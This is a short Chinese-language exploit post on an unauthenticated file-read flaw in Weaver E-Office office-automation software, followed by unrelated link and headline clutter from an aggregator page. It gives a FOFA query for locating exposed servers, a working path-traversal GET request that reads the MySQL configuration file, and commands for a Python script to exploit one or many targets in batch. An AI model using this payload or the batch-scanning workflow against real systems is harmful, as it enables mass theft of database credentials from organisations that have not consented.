泛微E-Office文件读取漏洞
泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。泛微E-Office能够帮助企业实现全流程数字化、自动化,提高工作效率和管理质量,降低管理成本,为企业提供全面、高效、便捷的办公服务。
泛微E-Office前台文件读取漏洞。
二、网络空间搜索引擎查询
fofa查询
app=“泛微-EOffice”
三、漏洞复现
poc
GET /iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0
浏览器直接访问返回如下
四、批量检测与利用
单个检测与利用
python .\E-OfficeReadfile.py -u http://ip:port
批量检测
python .\E-OfficeReadfile.py -f filename
关注公众号:拾黑(shiheibook)了解更多
友情链接:
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
安全、绿色软件下载就上极速下载站:https://www.yaorank.com/
![甜仇:天天开心 好好吃饭[爱你] ](https://imgs.knowsafe.com:8087/img/aideep/2021/7/5/afd0df64a0362a1c5371a0477bec01db.jpg?w=250)
![Yww超人哥哥:气的我大清早更新微博[并不简单]](https://imgs.knowsafe.com:8087/img/aideep/2021/8/1/5ec748b8e6debe758f1d903fcb85d68e.jpg?w=250)
you19990911
关注网络尖刀微信公众号随时掌握互联网精彩
- UnifyDrive推出UT2便携全闪存NAS:基于RK3588C 内置UPS电池
- PCIe 5.0 SSD八块合体:飚出56GB/s 还是差口气
- 玉溪种植网 v5.0.0最新版本2022下载地址
- 易速客户管理软件 1.29最新版本2022下载地址
- 靠谱商城app v1.6最新版本2022下载地址
- 张静初被美国电影学院导演系录取
- 和平精英中远距离移动中的敌人用狙击枪还是用步枪来打?
- 拉勾网 v7.60.0最新版本2022下载地址
- 烈火御龙ios版 v1.0最新版本2022下载地址
- Waazy哇叽 v2.6.0最新版本2022下载地址
- 哈尔滨交通出行 v1.2.6最新版本2022下载地址
- 普惠百家app V1.0最新版本2022下载地址
